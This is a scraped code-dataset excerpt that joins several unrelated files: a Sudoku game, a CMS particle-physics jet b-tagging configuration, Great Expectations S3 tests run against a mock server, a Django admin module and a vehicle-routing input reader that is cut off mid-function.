        print('\tRecall@20:\t%.4f\tMMR@20:\t%.4f\tEpoch:\t%d,\t%d'% (best_result[0], best_result[1], best_epoch[0], best_epoch[1]))
        # Early stopping: count epochs where neither metric improved.
        bad_counter += 1 - flag
        if bad_counter >= opt.patience:
            break
    print('-------------------------------------------------------')
    end = time.time()
    print("Run time: %f s" % (end - start))
if __name__ == '__main__':
main()
| [
"johnny12150@gmail.com"
] | johnny12150@gmail.com |
45d28aa10f25871b33de9573c126392639152d09 | 847273de4b1d814fab8b19dc651c651c2d342ede | /.history/Sudoku_II_003_20180618133626.py | 749199c16ddebe39bbc973c2ba32a1bfd48fc600 | [] | no_license | Los4U/sudoku_in_python | 0ba55850afcffeac4170321651620f3c89448b45 | 7d470604962a43da3fc3e5edce6f718076197d32 | refs/heads/master | 2020-03-22T08:10:13.939424 | 2018-07-04T17:21:13 | 2018-07-04T17:21:13 | 139,749,483 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,849 | py | from random import randint
# Sudoku1 almost solved
sudoku1 = [
[5, 9, 8, 6, 1, 2, 3, 4, 7],
[2, 1, 7, 9, 3, 4, 8, 6, 5],
[6, 4, 3, 5, 8, 7, 1, 2, 9],
[1, 6, 5, 4, 9, 8, 2, 7, 3],
[3, 2, 9, 7, 6, 5, 4, 1, 8],
[7, 8, 4, 3, 2, 1, 5, 9, 6],
[8, 3, 1, 2, 7, 6, 9, 5, 4],
[4, 7, 2, 8, 5, 9, 6, 3, 1],
[9, 5, ' ', ' ', ' ', ' ', ' ', ' ', 2]
]
i = 0
while i < 10:
if i == 0:
print(" 1 2 3 4 5 6 7 8 9")
print(" -------------------------")
elif i == 3 or i == 6 or i == 9:
print(" -------------------------")
spaceBar = "|"
if i < 9:
print('{2} {1} {0[0]} {0[1]} {0[2]} {1} {0[3]} {0[4]} {0[5]} {1} {0[6]} {0[7]} {0[8]} {1}'.format(sudoku1[i], spaceBar,i+1))
i = i + 1
while True: # prints Sudoku until is solved
    # NOTE(review): the row1..row9 lists assigned below are never defined in
    # the active code of this file (they appear only in the commented-out
    # section further down), so any valid move raises NameError -- TODO
    # define them or drop the per-row branches.
    print("Input 3 numbers in format a b c, np. 4 5 8")
    print(" a - row number")
    print(" b - column number ")
    print(" c - value")
    #vprint(" r - reset chart to start\n ")
    x = input("Input a b c: ")
    print("")
    numbers = " 0123456789" # conditions of entering the numbers !
    # Accept only "<digit> <digit> <digit>": length 5 with spaces at
    # positions 1 and 3; anything else is either the reset command or an error.
    if (len(x) != 5) or (str(x[0]) not in numbers) or (str(x[2]) not in numbers) or (
            str(x[4]) not in numbers) or (str(x[1]) != " ") or (str(x[3]) != " "):
        if x == "r": # reset
            print(" Function reset() will be ready in Next Week")
        else:
            print("Error - wrong number format \n ")
        continue
    # NOTE(review): the cell value is stored as the character x[4] (str),
    # while the initial board holds ints -- TODO confirm intent.
    sudoku1[int(x[0])-1][int(x[2])-1] = x[4]
    if int(x[0]) == 1:
        row1[int(x[2]) - 1] = int(x[4])
    elif int(x[0]) == 2:
        row2[int(x[2]) - 1] = int(x[4])
    elif int(x[0]) == 3:
        row3[int(x[2]) - 1] = int(x[4])
    elif int(x[0]) == 4:
        row4[int(x[2]) - 1] = int(x[4])
    elif int(x[0]) == 5:
        row5[int(x[2]) - 1] = int(x[4])
    elif int(x[0]) == 6:
        row6[int(x[2]) - 1] = int(x[4])
    elif int(x[0]) == 7:
        row7[int(x[2]) - 1] = int(x[4])
    elif int(x[0]) == 8:
        row8[int(x[2]) - 1] = int(x[4])
    elif int(x[0]) == 9:
        row9[int(x[2]) - 1] = int(x[4])
# Sudoku 2 almost solved
# row1 = [9,8,7,4,3,2,5,6,1]
# row2 = [2,4,3,5,1,6,8,7,9]
# row3 = [5,6,1,7,9,8,4,3,2]
# row4 = [3,9,5,6,4,7,2,1,8]
# row5 = [8,2,4,3,5,1,6,9,7]
# row6 = [1,7,6,2,8,9,3,4,5]
# row7 = [7,1,2,8,6,3,9,5,4]
# row8 = [4,3,8,9,7,5,1,2,6]
# row9 = [' ',5,' ',' ',2,' ',7,' ',' ']
'''
columns = [1, 2, 3, 4, 5, 6, 7, 8, 9]
r1 = [[5, 9, 8, 6, 1, 2, 3, 4, 7], [9, 8, 7, 4, 3, 2, 5, 6, 1]]
r2 = [[2, 1, 7, 9, 3, 4, 8, 6, 5], [2, 4, 3, 5, 1, 6, 8, 7, 9]]
r3 = [[6, 4, 3, 5, 8, 7, 1, 2, 9], [5, 6, 1, 7, 9, 8, 4, 3, 2]]
r4 = [[1, 6, 5, 4, 9, 8, 2, 7, 3], [3, 9, 5, 6, 4, 7, 2, 1, 8]]
r5 = [[3, 2, 9, 7, 6, 5, 4, 1, 8], [8, 2, 4, 3, 5, 1, 6, 9, 7]]
r6 = [[7, 8, 4, 3, 2, 1, 5, 9, 6], [1, 7, 6, 2, 8, 9, 3, 4, 5]]
r7 = [[8, 3, 1, 2, 7, 6, 9, 5, 4], [7, 1, 2, 8, 6, 3, 9, 5, 4]]
r8 = [[4, 7, 2, 8, 5, 9, 6, 3, 1], [4, 3, 8, 9, 7, 5, 1, 2, 6]]
r9 = [[9, 5, ' ', ' ', ' ', ' ', ' ', ' ', 2], [6, 5, ' ', 1, ' ',
' ', 7, 8, ' ']] # 9 1 6, 9 3 9, 9 4 1, 9 6 4, 9 8 8, 9 9 3
# r9=[[9,5, ' ', ' ', ' ', ' ', ' ', ' ',2],[' ',5,' ',' ',2,' ',7,' ','
# ']] # 9 1 6, 9 3 9, 9 4 1, 9 6 4, 9 8 8, 9 9 3
print(" ")
print(" %@@@@@@@ @@@ @@@ (@@@@@@@@@ ,@@@@2@@@@@ @@@, /@@@/ @@@, @@@ ")
print(" @@@* @@@ @@@ (@@( /@@@# .@@@% (@@@ @@@, @@@% @@@, @@@. ")
print(" @@@& @@@ @@@ (@@( @@@* @@@% #@@% @@@,.@@@. @@@, @@@. ")
print(" ,@@@@@@* @@@ @@@ (@@( (@@% .@@@* ,@@@ @@@%@@% @@@, @@@. ")
print(" /@@@@@# @@@ @@@ (@@( (@@% .@@@* ,@@@ @@@,@@@( @@@, @@@. ")
print(" *@@@. @@@ .@@& (@@( @@@. @@@% &@@( @@@, &@@@. @@@* .@@@. ")
print(" &, &@@@ #@@@. ,@@@, (@@( ,&@@@* ,@@@& .@@@@ @@@, (@@@/ #@@@* @@@# ")
print(",@@@@@@@@( (@@@@@@@@% (@@@@@@@@@( #@@@@@@@@@, @@@, ,@@@% ,@@@@@@@@@. \n ")
print("To start game input:")
print(" r - to load random puzzle:")
print(" 1 - to load chart nr 1:")
print(" 2 - to load chart nr 2:")
print(" 3 - to load chart nr 3:")
choice = input("Input here: ")
if choice == "R" or choice == "r":
sudoku_number = randint(0, 1)
rows_fill(sudoku_number)
elif int(choice) == 1:
rows_fill(0)
elif int(choice) == 2:
rows_fill(1)
elif int(choice) == 3:
rows_fill(0)
print("Your sudoku to solve:")
try:
if sum(row1) == 45 and sum(row2) == 45 and sum(row3) == 45 and sum(row4) == 45 and sum(
row5) == 45 and sum(row6) == 45 and sum(row7) == 45 and sum(row8) == 45 and sum(row9) == 45:
print("YOU WIN")
break
except TypeError:
print()
'''
| [
"inz.kamil.wos@gmail.com"
] | inz.kamil.wos@gmail.com |
511c9b0d7215e0f07ac854e1432936f04778ae66 | 37c243e2f0aab70cbf38013d1d91bfc3a83f7972 | /pp7TeV/HeavyIonsAnalysis/JetAnalysis/python/jets/ak6PFJetSequence_pPb_mc_bTag_cff.py | 4ad43ec58638c60213bfc117e17f453046685d97 | [] | no_license | maoyx/CMSWork | 82f37256833cbe4c60cb8df0b4eb68ceb12b65e7 | 501456f3f3e0f11e2f628b40e4d91e29668766d5 | refs/heads/master | 2021-01-01T18:47:55.157534 | 2015-03-12T03:47:15 | 2015-03-12T03:47:15 | 10,951,799 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,363 | py |
import FWCore.ParameterSet.Config as cms
from PhysicsTools.PatAlgos.patHeavyIonSequences_cff import *
from HeavyIonsAnalysis.JetAnalysis.inclusiveJetAnalyzer_cff import *
from HeavyIonsAnalysis.JetAnalysis.bTaggers_cff import *
from RecoJets.JetProducers.JetIDParams_cfi import *
# --- Inputs for anti-kT R=0.6 particle-flow jets (pPb MC with b-tagging) ---
# Match reconstructed PF jets to heavy-ion generator-level jets.
ak6PFmatch = patJetGenJetMatch.clone(
src = cms.InputTag("ak6PFJets"),
matched = cms.InputTag("ak6HiGenJets")
)
# Match reconstructed PF jets to their originating generator partons.
ak6PFparton = patJetPartonMatch.clone(src = cms.InputTag("ak6PFJets")
)
# Jet-energy-correction factors: L2Relative and L3Absolute levels only.
ak6PFcorr = patJetCorrFactors.clone(
useNPV = False,
# primaryVertices = cms.InputTag("hiSelectedVertex"),
levels = cms.vstring('L2Relative','L3Absolute'),
src = cms.InputTag("ak6PFJets"),
payload = "AK6PF_generalTracks"
)
# Jet ID is computed from the matching calo-jet collection, not the PF jets.
ak6PFJetID= cms.EDProducer('JetIDProducer', JetIDParams, src = cms.InputTag('ak6CaloJets'))
# Generator jets cleaned of heavy-ion background particles.
ak6PFclean = heavyIonCleanedGenJets.clone(src = cms.InputTag('ak6HiGenJets'))
# Factory instantiating every b-tagging module with the "ak6PF" prefix.
ak6PFbTagger = bTaggers("ak6PF")
#create objects locally since they dont load properly otherwise
# NOTE(review): the next two assignments overwrite the ak6PFmatch/ak6PFparton
# clones configured above with the bTagger factory's versions.
ak6PFmatch = ak6PFbTagger.match
ak6PFparton = ak6PFbTagger.parton
# Hoist the factory's modules to module-level names so CMSSW can find them.
ak6PFPatJetFlavourAssociation = ak6PFbTagger.PatJetFlavourAssociation
ak6PFJetTracksAssociatorAtVertex = ak6PFbTagger.JetTracksAssociatorAtVertex
ak6PFSimpleSecondaryVertexHighEffBJetTags = ak6PFbTagger.SimpleSecondaryVertexHighEffBJetTags
ak6PFSimpleSecondaryVertexHighPurBJetTags = ak6PFbTagger.SimpleSecondaryVertexHighPurBJetTags
ak6PFCombinedSecondaryVertexBJetTags = ak6PFbTagger.CombinedSecondaryVertexBJetTags
ak6PFCombinedSecondaryVertexMVABJetTags = ak6PFbTagger.CombinedSecondaryVertexMVABJetTags
ak6PFJetBProbabilityBJetTags = ak6PFbTagger.JetBProbabilityBJetTags
ak6PFSoftMuonByPtBJetTags = ak6PFbTagger.SoftMuonByPtBJetTags
ak6PFSoftMuonByIP3dBJetTags = ak6PFbTagger.SoftMuonByIP3dBJetTags
ak6PFTrackCountingHighEffBJetTags = ak6PFbTagger.TrackCountingHighEffBJetTags
ak6PFTrackCountingHighPurBJetTags = ak6PFbTagger.TrackCountingHighPurBJetTags
ak6PFPatJetPartonAssociation = ak6PFbTagger.PatJetPartonAssociation
# Impact-parameter (track-based) taggers.
ak6PFImpactParameterTagInfos = ak6PFbTagger.ImpactParameterTagInfos
ak6PFJetProbabilityBJetTags = ak6PFbTagger.JetProbabilityBJetTags
ak6PFPositiveOnlyJetProbabilityJetTags = ak6PFbTagger.PositiveOnlyJetProbabilityJetTags
ak6PFNegativeOnlyJetProbabilityJetTags = ak6PFbTagger.NegativeOnlyJetProbabilityJetTags
ak6PFNegativeTrackCountingHighEffJetTags = ak6PFbTagger.NegativeTrackCountingHighEffJetTags
ak6PFNegativeTrackCountingHighPur = ak6PFbTagger.NegativeTrackCountingHighPur
ak6PFNegativeOnlyJetBProbabilityJetTags = ak6PFbTagger.NegativeOnlyJetBProbabilityJetTags
ak6PFPositiveOnlyJetBProbabilityJetTags = ak6PFbTagger.PositiveOnlyJetBProbabilityJetTags
# Secondary-vertex based taggers.
ak6PFSecondaryVertexTagInfos = ak6PFbTagger.SecondaryVertexTagInfos
# NOTE(review): the next four assignments are exact duplicates of lines above.
ak6PFSimpleSecondaryVertexHighEffBJetTags = ak6PFbTagger.SimpleSecondaryVertexHighEffBJetTags
ak6PFSimpleSecondaryVertexHighPurBJetTags = ak6PFbTagger.SimpleSecondaryVertexHighPurBJetTags
ak6PFCombinedSecondaryVertexBJetTags = ak6PFbTagger.CombinedSecondaryVertexBJetTags
ak6PFCombinedSecondaryVertexMVABJetTags = ak6PFbTagger.CombinedSecondaryVertexMVABJetTags
ak6PFSecondaryVertexNegativeTagInfos = ak6PFbTagger.SecondaryVertexNegativeTagInfos
ak6PFSimpleSecondaryVertexNegativeHighEffBJetTags = ak6PFbTagger.SimpleSecondaryVertexNegativeHighEffBJetTags
ak6PFSimpleSecondaryVertexNegativeHighPurBJetTags = ak6PFbTagger.SimpleSecondaryVertexNegativeHighPurBJetTags
ak6PFCombinedSecondaryVertexNegativeBJetTags = ak6PFbTagger.CombinedSecondaryVertexNegativeBJetTags
ak6PFCombinedSecondaryVertexPositiveBJetTags = ak6PFbTagger.CombinedSecondaryVertexPositiveBJetTags
# Soft-muon based taggers.
ak6PFSoftMuonTagInfos = ak6PFbTagger.SoftMuonTagInfos
ak6PFSoftMuonBJetTags = ak6PFbTagger.SoftMuonBJetTags
ak6PFSoftMuonByIP3dBJetTags = ak6PFbTagger.SoftMuonByIP3dBJetTags
ak6PFSoftMuonByPtBJetTags = ak6PFbTagger.SoftMuonByPtBJetTags
ak6PFNegativeSoftMuonByPtBJetTags = ak6PFbTagger.NegativeSoftMuonByPtBJetTags
ak6PFPositiveSoftMuonByPtBJetTags = ak6PFbTagger.PositiveSoftMuonByPtBJetTags
# Parton association followed by flavour assignment.
ak6PFPatJetFlavourId = cms.Sequence(ak6PFPatJetPartonAssociation*ak6PFPatJetFlavourAssociation)
# All impact-parameter taggers share one ImpactParameterTagInfos product.
ak6PFJetBtaggingIP = cms.Sequence(ak6PFImpactParameterTagInfos *
(ak6PFTrackCountingHighEffBJetTags +
ak6PFTrackCountingHighPurBJetTags +
ak6PFJetProbabilityBJetTags +
ak6PFJetBProbabilityBJetTags +
ak6PFPositiveOnlyJetProbabilityJetTags +
ak6PFNegativeOnlyJetProbabilityJetTags +
ak6PFNegativeTrackCountingHighEffJetTags +
ak6PFNegativeTrackCountingHighPur +
ak6PFNegativeOnlyJetBProbabilityJetTags +
ak6PFPositiveOnlyJetBProbabilityJetTags
)
)
# Secondary-vertex taggers; IP TagInfos must run before SV TagInfos.
ak6PFJetBtaggingSV = cms.Sequence(ak6PFImpactParameterTagInfos
*
ak6PFSecondaryVertexTagInfos
* (ak6PFSimpleSecondaryVertexHighEffBJetTags
+
ak6PFSimpleSecondaryVertexHighPurBJetTags
+
ak6PFCombinedSecondaryVertexBJetTags
+
ak6PFCombinedSecondaryVertexMVABJetTags
)
)
# Negative secondary-vertex taggers.
ak6PFJetBtaggingNegSV = cms.Sequence(ak6PFImpactParameterTagInfos
*
ak6PFSecondaryVertexNegativeTagInfos
* (ak6PFSimpleSecondaryVertexNegativeHighEffBJetTags
+
ak6PFSimpleSecondaryVertexNegativeHighPurBJetTags
+
ak6PFCombinedSecondaryVertexNegativeBJetTags
+
ak6PFCombinedSecondaryVertexPositiveBJetTags
)
)
# Soft-muon taggers, all driven by SoftMuonTagInfos.
ak6PFJetBtaggingMu = cms.Sequence(ak6PFSoftMuonTagInfos * (ak6PFSoftMuonBJetTags
+
ak6PFSoftMuonByIP3dBJetTags
+
ak6PFSoftMuonByPtBJetTags
+
ak6PFNegativeSoftMuonByPtBJetTags
+
ak6PFPositiveSoftMuonByPtBJetTags
)
)
# Complete b-tagging chain: IP, SV, negative SV, then soft-muon taggers.
ak6PFJetBtagging = cms.Sequence(ak6PFJetBtaggingIP
*ak6PFJetBtaggingSV
*ak6PFJetBtaggingNegSV
*ak6PFJetBtaggingMu
)
# PAT jets enriched with the gen matches, JEC factors, flavour map, track
# association and all b-tag discriminators configured above.
ak6PFpatJetsWithBtagging = patJets.clone(jetSource = cms.InputTag("ak6PFJets"),
genJetMatch = cms.InputTag("ak6PFmatch"),
genPartonMatch = cms.InputTag("ak6PFparton"),
jetCorrFactorsSource = cms.VInputTag(cms.InputTag("ak6PFcorr")),
JetPartonMapSource = cms.InputTag("ak6PFPatJetFlavourAssociation"),
trackAssociationSource = cms.InputTag("ak6PFJetTracksAssociatorAtVertex"),
discriminatorSources = cms.VInputTag(cms.InputTag("ak6PFSimpleSecondaryVertexHighEffBJetTags"),
cms.InputTag("ak6PFSimpleSecondaryVertexHighPurBJetTags"),
cms.InputTag("ak6PFCombinedSecondaryVertexBJetTags"),
cms.InputTag("ak6PFCombinedSecondaryVertexMVABJetTags"),
cms.InputTag("ak6PFJetBProbabilityBJetTags"),
cms.InputTag("ak6PFJetProbabilityBJetTags"),
cms.InputTag("ak6PFSoftMuonByPtBJetTags"),
cms.InputTag("ak6PFSoftMuonByIP3dBJetTags"),
cms.InputTag("ak6PFTrackCountingHighEffBJetTags"),
cms.InputTag("ak6PFTrackCountingHighPurBJetTags"),
),
jetIDMap = cms.InputTag("ak6PFJetID"),
addBTagInfo = True,
addTagInfos = True,
addDiscriminators = True,
addAssociatedTracks = True,
addJetCharge = False,
addJetID = True,
getJetMCFlavour = True,
addGenPartonMatch = True,
addGenJetMatch = True,
embedGenJetMatch = True,
embedGenPartonMatch = True,
embedCaloTowers = False,
embedPFCandidates = True
)
# Ntuple-producing analyzer for this MC jet collection (fills gen jets,
# lifetime-tagging info, and reads the HISIGNAL trigger results).
ak6PFJetAnalyzer = inclusiveJetAnalyzer.clone(jetTag = cms.InputTag("ak6PFpatJetsWithBtagging"),
genjetTag = 'ak6HiGenJets',
rParam = 0.6,
matchJets = cms.untracked.bool(False),
matchTag = 'patJetsWithBtagging',
pfCandidateLabel = cms.untracked.InputTag('particleFlow'),
trackTag = cms.InputTag("generalTracks"),
fillGenJets = True,
isMC = True,
genParticles = cms.untracked.InputTag("hiGenParticles"),
eventInfoTag = cms.InputTag("generator"),
doLifeTimeTagging = cms.untracked.bool(True),
doLifeTimeTaggingExtras = cms.untracked.bool(True),
bTagJetName = cms.untracked.string("ak6PF"),
genPtMin = cms.untracked.double(15),
hltTrgResults = cms.untracked.string('TriggerResults::'+'HISIGNAL')
)
# Full MC chain: gen-jet cleaning, matching, JEC, jet ID, flavour ID,
# track association, b-tagging, PAT jets, analyzer.
ak6PFJetSequence_mc = cms.Sequence(
ak6PFclean
*
ak6PFmatch
*
ak6PFparton
*
ak6PFcorr
*
ak6PFJetID
*
ak6PFPatJetFlavourId
*
ak6PFJetTracksAssociatorAtVertex
*
ak6PFJetBtagging
*
ak6PFpatJetsWithBtagging
*
ak6PFJetAnalyzer
)
# Data chain: same as MC but without any generator-level steps.
ak6PFJetSequence_data = cms.Sequence(ak6PFcorr
*
ak6PFJetTracksAssociatorAtVertex
*
ak6PFJetBtagging
*
ak6PFpatJetsWithBtagging
*
ak6PFJetAnalyzer
)
# JEC and mixed-sample variants reuse the MC sequence unchanged.
ak6PFJetSequence_jec = ak6PFJetSequence_mc
ak6PFJetSequence_mix = ak6PFJetSequence_mc
# This configuration is for MC, so the exported sequence is the MC one.
ak6PFJetSequence = cms.Sequence(ak6PFJetSequence_mc)
| [
"yaxian.mao@cern.ch"
] | yaxian.mao@cern.ch |
b052cc54020a43043bb7d1822c05072b653f6113 | 46f358b954d2d0067a2093ee9006e222f831a8f8 | /tests/datasource/batch_kwarg_generator/test_s3_subdir_reader_generator.py | 474a13f241874c6c833756f7ae698d9226069a0e | [
"Apache-2.0"
] | permissive | dhruvvyas90/great_expectations | b963aa99c683a0da3a9e2b5a1046d2a32f622c7b | fddf5336065c644558c528301e601b9f02be87e2 | refs/heads/main | 2023-01-28T15:26:55.331282 | 2020-12-03T18:52:14 | 2020-12-03T18:52:14 | 319,719,900 | 1 | 0 | Apache-2.0 | 2020-12-08T18:02:33 | 2020-12-08T18:02:32 | null | UTF-8 | Python | false | false | 3,651 | py | import logging
import os
import time
import pandas as pd
import pytest
import requests
from botocore.session import Session
from great_expectations.datasource.batch_kwargs_generator import (
S3SubdirReaderBatchKwargsGenerator,
)
from great_expectations.exceptions import BatchKwargsError
# Port and endpoint of the local moto S3 server started by the s3_base fixture.
port = 5555
endpoint_uri = "http://127.0.0.1:%s/" % port
# Dummy AWS credentials so botocore clients can sign requests against moto.
os.environ["AWS_ACCESS_KEY_ID"] = "dummy_key"
os.environ["AWS_SECRET_ACCESS_KEY"] = "dummy_secret"
@pytest.fixture(scope="module")
def s3_base():
    """Spin up a local moto S3 server for this test module, tear it down after.

    Polls the endpoint for up to ~5 seconds until it answers before yielding.
    """
    # writable local S3 system
    import shlex
    import subprocess

    proc = subprocess.Popen(shlex.split("moto_server s3 -p %s" % port))

    timeout = 5
    while timeout > 0:
        try:
            r = requests.get(endpoint_uri)
            if r.ok:
                break
        except Exception:
            # Server not accepting connections yet; keep polling.
            # (Was a bare `except:`, which also swallowed KeyboardInterrupt.)
            pass
        timeout -= 0.1
        time.sleep(0.1)
    yield
    proc.terminate()
    proc.wait()
@pytest.fixture(scope="module")
def mock_s3_bucket(s3_base):
    """Create bucket "test_bucket" on the moto server and seed it with two
    small CSV objects under data/for/; yields the bucket name."""
    bucket = "test_bucket"
    session = Session()
    client = session.create_client("s3", endpoint_url=endpoint_uri)
    client.create_bucket(Bucket=bucket, ACL="public-read")
    # The same 3x2 frame is serialized into both keys.
    df = pd.DataFrame({"c1": [1, 2, 3], "c2": ["a", "b", "c"]})
    keys = [
        "data/for/you.csv",
        "data/for/me.csv",
    ]
    for key in keys:
        client.put_object(
            Bucket=bucket, Body=df.to_csv(index=None).encode("utf-8"), Key=key
        )
    yield bucket
@pytest.fixture
def s3_subdir_generator(mock_s3_bucket, basic_sparkdf_datasource):
    """Batch-kwargs generator rooted at test_bucket/data/for, so each CSV
    file under that prefix is exposed as its own data asset."""
    # We configure a generator that will fetch from (mocked) my_bucket
    # and will use glob patterns to match returned assets into batches of the same asset
    generator = S3SubdirReaderBatchKwargsGenerator(
        "my_generator",
        datasource=basic_sparkdf_datasource,
        boto3_options={"endpoint_url": endpoint_uri},
        base_directory="test_bucket/data/for",
        reader_options={"sep": ","},
    )
    yield generator
@pytest.fixture
def s3_subdir_generator_with_partition(mock_s3_bucket, basic_sparkdf_datasource):
    """Generator rooted one level higher (test_bucket/data/), so the "for"
    subdirectory becomes the asset and its files become partitions."""
    # We configure a generator that will fetch from (mocked) my_bucket
    # and will use glob patterns to match returned assets into batches of the same asset
    generator = S3SubdirReaderBatchKwargsGenerator(
        "my_generator",
        datasource=basic_sparkdf_datasource,
        boto3_options={"endpoint_url": endpoint_uri},
        base_directory="test_bucket/data/",
        reader_options={"sep": ","},
    )
    yield generator
def test_s3_subdir_generator_basic_operation(s3_subdir_generator):
    """The generator reports exactly the two seeded CSV assets, by stem."""
    # S3 Generator sees *only* configured assets
    assets = s3_subdir_generator.get_available_data_asset_names()
    print(assets)
    assert set(assets["names"]) == {
        ("you", "file"),
        ("me", "file"),
    }
def test_s3_subdir_generator_reader_options_configuration(s3_subdir_generator):
    """The configured reader_options are propagated into each batch kwargs."""
    iterator = s3_subdir_generator.get_iterator(data_asset_name="you", limit=10)
    batch_kwargs_list = list(iterator)
    print(batch_kwargs_list)
    assert batch_kwargs_list[0]["reader_options"] == {"sep": ","}
def test_s3_subdir_generator_build_batch_kwargs_no_partition_id(s3_subdir_generator):
    """Without a partition id, batch kwargs point at the asset's s3a:// path."""
    batch_kwargs = s3_subdir_generator.build_batch_kwargs("you")
    assert batch_kwargs["s3"] in [
        "s3a://test_bucket/data/for/you.csv",
    ]
def test_s3_subdir_generator_build_batch_kwargs_partition_id(
    s3_subdir_generator_with_partition, basic_sparkdf_datasource
):
    """With asset "for" and partition "you", the s3a path resolves to the file.

    NOTE(review): basic_sparkdf_datasource is requested but not used directly;
    presumably only needed so the fixture chain is set up — confirm.
    """
    batch_kwargs = s3_subdir_generator_with_partition.build_batch_kwargs("for", "you")
    assert batch_kwargs["s3"] == "s3a://test_bucket/data/for/you.csv"
| [
"noreply@github.com"
] | dhruvvyas90.noreply@github.com |
df4c36a1dc5bc53bae474b0786ee097f35deb401 | 69be72354ed9382f36ec2264d5e4b60cdf71f5e9 | /01_hello.py | 909b04a52c610505ed440ed6878ec74ac377c176 | [] | no_license | trungams/mcgill-comp204-example-code | 0e4a327684097044e105e67a0f16dd8294320e0f | 7a62f1becfd9f33c499ec60251b04557743b4cfe | refs/heads/master | 2020-05-18T02:32:54.484052 | 2019-04-29T18:00:43 | 2019-04-29T18:00:43 | 184,119,272 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 589 | py | #!/usr/bin/env python3
"""
A simple program that prints the message Hello, world!
"""
if __name__ == '__main__':
    # Runs only when executed as a script, not when the module is imported.
    print("Hello, world!")  # prints the greeting to stdout
    # Comments in Python start with a '#'.
    """However, developers takes advantage of triple-quoted string literals
    in Python to document their code, it can span multiple lines, and hence
    often used as multi line comments
    """
    "With the same reasoning, double-quoted strings can also be used to comment"
    # The official style guide encourages triple quotes for docstrings.
| [
"vttrung12@gmail.com"
] | vttrung12@gmail.com |
f5c421078f74367978d8ce242ab1cd6b034f6cfc | 5c69c98a0d6240532593b725ed9ec7b66145bc64 | /products/admin.py | f19c11bf199695b871b2781a18d9b85cac344ad8 | [] | no_license | Galiaph/django_test | 9a97447f96c21320b5f9943cb9a5f0da6937a20c | e7153dd318ce65d627b9f2596bf39db5a65ec782 | refs/heads/master | 2020-03-07T19:10:49.833654 | 2018-04-17T20:17:07 | 2018-04-17T20:17:07 | 127,664,423 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 590 | py | from django.contrib import admin
from .models import *
class ProductImageInline(admin.TabularInline):
    # Inline table of ProductImage rows shown on the Product admin page.
    model = ProductImage
    extra = 0  # no blank "add another" rows by default
class ProductAdmin(admin.ModelAdmin):
    # Show every model field as a column in the admin change list.
    list_display = [field.name for field in Product._meta.fields]
    inlines = [ProductImageInline]
    # NOTE(review): ModelAdmin does not read an inner Meta class; this looks
    # like a ModelForm idiom carried over with no effect here — confirm intent.
    class Meta:
        model = Product
admin.site.register(Product, ProductAdmin)
class ProductImageAdmin(admin.ModelAdmin):
    # Show every model field as a column in the admin change list.
    list_display = [field.name for field in ProductImage._meta.fields]
    class Meta:
        model = ProductImage
admin.site.register(ProductImage, ProductImageAdmin)
| [
"galiaph@gmail.com"
] | galiaph@gmail.com |
c77e5dd5865c4b2fa11a7b2cf99bdae5d46cb5f3 | 6602091e12f9725d2463589a64d7f661e25d65d7 | /src/input.py | 4ff4fe8098e90945e9ab8fefeb083bbbb184e6b7 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | xBorox1/D-Wave-VRP | e9eb62998f2bb34130f534b93c46a1a33069f414 | dd9b51c812d4f5607dae6ce3ac528d013e5a6f27 | refs/heads/master | 2023-03-13T23:39:15.384346 | 2021-03-06T09:21:54 | 2021-03-06T09:21:54 | 284,447,637 | 8 | 7 | null | 2021-03-06T09:21:55 | 2020-08-02T11:25:27 | Python | UTF-8 | Python | false | false | 4,641 | py | import networkx as nx
import csv
import math
from itertools import product
from vrp_problem import VRPProblem
import numpy as np
# Creates directed graph from file.
# Format : id1|id2|cost
def create_graph_from_csv(path):
    """Build a directed graph from a CSV edge list.

    After a header row, each record holds (id1, id2, cost); the cost is
    stored on the edge under the 'cost' attribute.
    """
    graph = nx.DiGraph(directed=True)
    with open(path, mode='r') as edge_file:
        records = csv.reader(edge_file)
        next(records)  # skip the header row
        for record in records:
            graph.add_edge(int(record[0]), int(record[1]), cost=float(record[2]))
    return graph
# Creates VRPProblem from test file and graph file.
# path - path to test file
# graph_path - path to graph file
# capacity - True if vehicles have capacities, False otherwise
def read_full_test(path, graph_path, capacity = True):
    """Build a VRPProblem from a test file plus a graph file.

    The test file lists magazine (depot) node ids, destination orders
    (node id and, if capacity is True, a weight) and vehicle capacities.
    Pairwise costs are obtained by summing edge costs along shortest
    paths in the graph loaded from graph_path.
    """
    graph = create_graph_from_csv(graph_path)
    in_file = open(path, 'r')
    # NOTE(review): this empty list is immediately overwritten below.
    nodes_id = list()
    # Reading magazines.
    next(in_file)  # skip the header line before the magazine ids
    nodes_id = [int(s) for s in in_file.readline().split() if s.isdigit()]
    magazines_num = len(nodes_id)
    # Reading destinations.
    dests_num = int(in_file.readline())
    nodes_num = dests_num + magazines_num
    weights = np.zeros((nodes_num), dtype=int)
    for i in range(dests_num):
        order = in_file.readline().split()
        dest = int(order[0])
        nodes_id.append(dest)
        if capacity:
            weight = int(order[1])
            weights[i + magazines_num] = weight
    # Reading vehicles.
    vehicles = int(in_file.readline())
    capacities = np.ones((vehicles), dtype=int)
    if capacity:
        capacities = [int(s) for s in in_file.readline().split() if s.isdigit()]
    # Generating costs matrix: for every node, run single-source Dijkstra
    # and accumulate the edge costs along each returned shortest path.
    costs = np.zeros((nodes_num, nodes_num), dtype=int)
    for i in range(nodes_num):
        source = nodes_id[i]
        _, paths = nx.single_source_dijkstra(graph, source, weight = 'cost')
        for j in range(nodes_num):
            d = nodes_id[j]
            path = paths[d]
            prev = source
            for node in path[1:]:
                edge = graph.get_edge_data(prev, node)
                costs[i][j] += edge['cost']
                prev = node
    in_file.close()
    # Internal indices: magazines first, then destinations.
    sources = [i for i in range(magazines_num)]
    dests = [i for i in range(magazines_num, nodes_num)]
    return VRPProblem(sources, costs, capacities, dests, weights)
# Creates VRPProblem from test file.
# path - path to test file
# capacity - True if vehicles have capacities, False otherwise
def read_test(path, capacity = True):
    """Create a VRPProblem from a single self-contained test file.

    File layout: number of magazines, number of destinations, optional
    destination weights, the full cost matrix (one row per line), the
    number of vehicles and optional vehicle capacities.  With
    capacity=False the weight/capacity lines are absent and every vehicle
    gets capacity 1.
    """
    # `with` guarantees the handle is closed even if parsing raises
    # (the original opened the file and leaked it on exceptions).
    with open(path, 'r') as in_file:
        magazines_num = int(in_file.readline())
